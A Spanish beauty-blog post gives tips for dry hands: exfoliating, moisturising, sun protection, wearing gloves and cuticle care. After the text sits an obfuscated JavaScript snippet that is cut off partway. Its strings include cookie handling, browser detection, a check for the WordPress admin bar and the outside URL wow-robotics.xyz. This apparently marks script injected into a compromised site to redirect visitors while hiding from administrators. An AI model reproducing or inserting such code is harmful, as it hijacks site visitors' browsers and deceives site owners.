Uno de los problemas más comunes que sufren las mujeres y los hombres, sobre todo cuando hace mucho frío o mucho calor, son las manos secas.

Hay determinados trabajos que exigen realizar tareas donde las manos se estropean más fácilmente y acaban mostrándose secas y muy envejecidas.

 

Para lucir unas manos bonitas debes:

Exfoliar tus manos antes de exponer tu piel al sol.

– Realizando enérgicos movimientos, hidrátalas con una crema específica de manos y deja actuar. Si vas a exponerte  al sol utiliza una crema con factor solar.

– Cuando salgas de la ducha, utiliza siempre una toalla caliente y seca los dedos entre mano y mano. Es muy importante que los dedos están bien secos ya que así evitarás que salgan antiestéticas pieles o descamaciones por la humedad.

– Utiliza siempre, una crema de manos para hidratar tus manos y evitar la sequedad. Procura aplicar la crema todos los días y extiéndela perfectamente hasta su completa absorción.

– El frío, también afecta en exceso a tus manos. Lo mejor, es que intentes protegerlas siempre de los cambios bruscos de temperatura. Aplica cremas y geles adecuados y ¡ponte guantes!

– Si tienes pequeñas heridas o pieles alrededor de tus uñas, no las arranques con las manos o la boca. Procura desinfectar siempre la parte afectada y luego, retira las pieles con ayuda de un instrumento adecuado, que no dañe tus manos ni tus uñas.

Lucir unas manos bonitas cuesta muy poco. ¡Así que, ya sabes! Cuida tus manos y ¡lúcelas siempre perfectas!

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone